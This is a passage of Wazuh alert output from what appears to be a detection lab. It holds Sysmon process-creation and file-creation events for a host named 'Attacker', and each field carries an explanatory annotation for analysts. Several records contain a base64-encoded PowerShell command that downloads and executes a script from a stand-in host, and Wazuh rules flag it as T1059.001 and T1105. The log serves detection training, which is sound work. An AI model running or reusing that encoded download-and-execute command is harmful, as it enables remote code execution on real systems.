data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:22.3661813Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284546 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:20.548
ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00}
ProcessId: 15900
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd59-680a-700b-000000000e00}
ParentProcessId: 15800
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:20.548 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd5c-680a-720b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15800 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 73 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534304.1615008 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:22.5603577Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284547 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:22.512
ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00}
ProcessId: 15900
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_uba1xjco.x5u.ps1
CreationUtcTime: 2025-04-24 22:38:22.512
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:22.512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd5c-680a-720b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uba1xjco.x5u.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:22.512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 70 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534307.1617777 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:25.2469858Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284576 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:23.806
ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00}
ProcessId: 16016
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00}
ParentProcessId: 15900
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:23.806 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd5f-680a-740b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16016 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 74 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534307.1625848 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:25.4788727Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284577 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:25.438
ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00}
ProcessId: 16016
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tvke0fdg.nch.ps1
CreationUtcTime: 2025-04-24 22:38:25.438
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:25.438 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd5f-680a-740b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16016 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tvke0fdg.nch.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:25.438 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 71 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534310.1628617 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:27.9090694Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284623 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:26.606
ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00}
ProcessId: 16188
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00}
ParentProcessId: 16016
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:26.606 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd62-680a-760b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
